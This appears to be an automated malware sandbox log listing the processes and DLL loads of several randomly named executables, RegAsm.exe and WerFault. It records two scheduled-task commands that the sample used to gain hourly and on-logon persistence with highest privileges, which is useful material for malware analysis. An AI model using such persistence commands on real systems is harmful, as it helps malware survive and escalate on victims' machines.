Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process created: C:\Users\user\AppData\Local\NewStar\newstar.exe "C:\Users\user\AppData\Local\NewStar\newstar.exe" -i
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: amsi.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Section loaded: umpdc.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: umpdc.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: pdh.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: mozglue.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wsock32.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
